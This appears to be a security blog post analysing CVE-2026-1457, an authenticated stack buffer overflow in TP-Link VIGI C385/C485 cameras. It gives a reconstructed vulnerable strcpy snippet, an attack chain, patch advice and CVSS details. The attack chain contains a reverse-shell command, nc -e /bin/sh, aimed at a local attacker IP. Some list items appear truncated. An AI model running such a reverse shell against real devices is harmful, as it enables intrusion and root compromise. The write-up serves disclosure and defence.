Jan 30, 2026·6 min read·21 visits
Authenticated stack-based buffer overflow in TP-Link VIGI C385/C485 cameras allows adjacent attackers with admin credentials to execute arbitrary code as root. Patched in firmware 3.1.1 Build 251124.
It is 2026, and apparently, we have learned nothing about memory safety. TP-Link's professional VIGI surveillance line falls victim to the oldest trick in the book: a stack-based buffer overflow in the Web API. This vulnerability allows an authenticated attacker on the local network to turn a security camera into a root-privileged pivot point.
We trust surveillance cameras to guard our perimeters, warehouses, and office lobbies. The TP-Link VIGI series is marketed exactly for this professional tier—robust, high-definition, and supposedly secure. But there is a delightful irony in security appliances that cannot secure themselves. While the VIGI C385 was busy looking for motion in the parking lot, it failed to notice the massive string of bytes being shoved into its Web API.
CVE-2026-1457 isn't some complex logical bypass or a race condition in a cloud synchronization protocol. It is a stack-based buffer overflow. Yes, the kind we were writing Phrack articles about in the 90s. The kind that happens when a developer assumes, "Nobody would ever send a string longer than 256 bytes, right?"
This vulnerability gives an attacker—provided they are on the local network and have authenticated access—complete control over the device. It transforms the camera from a security asset into a perfect, silent persistence point on your internal network. It runs Linux, it has network access, and nobody runs EDR on a camera.
The vulnerability resides in the camera's Web API component, specifically in how it handles configuration requests from authenticated users. The root cause is a classic lack of input sanitization. When the API receives a specific parameter (likely related to system configuration or logging), it copies that user-controlled data into a fixed-size buffer on the stack.
The developers likely used a function akin to strcpy or sprintf without enforcing a length check. In C/C++, these functions will happily keep writing past the end of the destination buffer until they hit a null terminator in the source string. If the destination is on the stack, the overflow overwrites adjacent memory variables.
In the memory layout of a function call, the "return address" (the instruction pointer telling the CPU where to go after the function finishes) sits just above the local variables on the stack. By overflowing the buffer, we don't just corrupt data; we corrupt the control flow. We overwrite that saved return address with a value of our choosing. When the function tries to return, it doesn't go back to the main loop—it jumps wherever we tell it to.
Since we don't have the raw source code (it's proprietary firmware), let's reconstruct the crime scene based on the vulnerability class. The vulnerable logic almost certainly looks like this standard embedded web server pattern:
void handle_api_request(char *user_input) {
char config_buffer[512]; // Fixed-size stack buffer
// VULNERABILITY: No length check on user_input!
// If user_input is > 512 bytes, we smash the stack.
strcpy(config_buffer, user_input);
process_config(config_buffer);
}When handle_api_request is called, the stack frame looks roughly like this:
If we send 600 bytes of 'A', the write starts at the buffer, fills it, overwrites the frame pointer, and then clobbers the Saved Return Address. The CPU eventually pops that corrupted address into the Program Counter (PC/IP), crashing the process—or executing our shellcode.
Exploiting this requires two things: adjacency and authentication. The CVSS score (8.5) reflects the fact that you need High Privileges (PR:H), but don't let that lower your guard. In the real world, "High Privileges" on a camera often translates to "admin/admin" or the default password printed on the sticker that the installer never changed.
The Attack Chain:
strcpy executes, and the stack is smashed.system() with an argument like /bin/sh -c 'nc -e /bin/sh 192.168.1.50 4444'.Because the web server usually runs as root on these embedded Linux devices to manage hardware interfaces, our shell inherits those permissions. Game over.
Why does this matter? "It's just a camera." That is exactly what makes it dangerous. Surveillance cameras are often placed on privileged networks to stream video to NVRs (Network Video Recorders). They have access to network segments that guest Wi-Fi does not.
An attacker with root access on a VIGI C385 can:
The requirement for authentication mitigates the risk of a generic internet-wide worm, but for a targeted insider threat or an attacker who has already breached the Wi-Fi, this is a golden ticket.
TP-Link has patched this in firmware version 3.1.1 Build 251124. If you are running VIGI C385 V1 or C485 V1, you are vulnerable until you update. The fix likely involves replacing the unsafe strcpy with strncpy or explicitly checking the input length against the buffer size before copying.
Immediate Actions:
CVSS:4.0/AV:A/AC:L/AT:N/PR:H/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N| Product | Affected Versions | Fixed Version |
|---|---|---|
VIGI C385 V1 TP-Link | < 3.1.1 Build 251124 | 3.1.1 Build 251124 |
VIGI C485 V1 TP-Link | < 3.1.1 Build 251124 | 3.1.1 Build 251124 |
| Attribute | Detail |
|---|---|
| CVE ID | CVE-2026-1457 |
| CWE | CWE-121 (Stack-based Buffer Overflow) |
| CVSS v4.0 | 8.5 (High) |
| Attack Vector | Adjacent Network |
| Privileges Required | High (Admin) |
| Impact | Remote Code Execution (Root) |
| Status | Patched |
A stack-based buffer overflow condition where a program writes to a memory buffer on the stack's call frame, overwriting adjacent memory locations such as the function return address.